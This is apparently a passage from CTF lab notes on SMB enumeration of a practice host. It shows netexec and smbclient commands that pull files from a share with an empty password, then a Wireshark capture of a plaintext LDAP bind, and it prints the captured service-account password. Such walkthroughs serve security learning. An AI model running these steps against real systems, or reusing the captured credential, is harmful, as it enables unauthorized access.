445

$ netexec smb 10.10.11.174 -u 'adot8' -p '' --shares
smbclient "\\\\10.10.11.174\\support-tools" -U 'adot8' -N
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
unzip UserInfo.exe.zip
$ cat UserInfo.exe.config

Dotnet framework installed means I can run executables

Open wireshark and listen on tun0. The LDAP query will be sent in plain text

support\ldap.$nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
PreviousEumerationNext88 Kerberos

Last updated

Was this helpful?